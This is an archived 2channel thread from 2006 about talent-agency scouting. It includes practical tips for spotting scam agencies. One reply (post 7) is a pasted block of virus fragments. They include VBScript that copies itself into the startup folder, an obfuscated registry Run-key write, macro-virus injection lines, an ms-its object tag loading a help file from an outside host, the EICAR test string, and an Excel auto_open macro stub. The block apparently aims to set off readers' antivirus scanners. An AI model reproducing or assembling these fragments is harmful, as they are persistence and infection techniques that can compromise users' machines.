2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

スカウトについて3回目

1 :無名モデル:2006/12/25(月) 19:50:02 ID:HutHvXi7
スカウトされた時の体験談や場所など色々語りましょう。

>>2-3も必ず見てね。

2 :無名モデル:2006/12/25(月) 19:50:58 ID:HutHvXi7
過去スレ

スカウトについて2回目
http://life7.2ch.net/test/read.cgi/model/1146962390/
スカウトについて
http://life7.2ch.net/test/read.cgi/model/1057846226/



スカウトされたんだけどぉ。。
http://life7.2ch.net/test/read.cgi/model/1063593131/
●★自分&友達がスカウトされた事務所
http://life7.2ch.net/test/read.cgi/model/1064333950/

3 :無名モデル:2006/12/25(月) 19:56:27 ID:???
スカウトされた時の注意点

・必ず名刺を貰いましょう。
   貰った名刺は返さなくても良いですよ。

・事務所のパンフや資料を見せて貰いましょう。
   スカウトする人ならば自分の事務所の資料位は持ってて当たり前です。

・安易に連絡先は教えずに、こちらから連絡すると言いましょう。
   連絡先を教えてくれなければスカウトしないと言うところは100%詐欺です。

・スカウトされてすぐに事務所には行かない事。
   言葉巧みに誘導されてしまいますよ。

・なぜ自分をスカウトしたのか聞いてみましょう。
   輝いて見えた、素敵だった、目をひいた等々抽象的な答えだけでなく、
   どういう所が輝いていたのか?素敵なのか?目をひいたのか?を具体的に聞いてみましょう。

・話をしていて怪しい部分や納得いかない部分についてはしつこい位につっこむ。
   詐欺事務所のスカウトマンは手間のかかる人には自分から離れていきます。
   もっと簡単に釣れる手間のかからない人を求めているため。

・お金の話は出来ればその場で確認しましょう。
   総額でいくらかかるのかを確認、すぐ元を取れるなんて言葉に騙されないで。

4 :無名モデル:2006/12/25(月) 20:31:47 ID:???


5 :無名モデル:2006/12/25(月) 21:05:03 ID:otNTSesf
office zeroってyisdと手口同じなの?

6 :細木クズ子 ◆TrOSwnMb2Y :2006/12/26(火) 15:41:11 ID:nXz45nIF
「スカトロについて」に見えたwwwwww

7 :<body onload=window()>:2006/12/26(火) 17:01:43 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)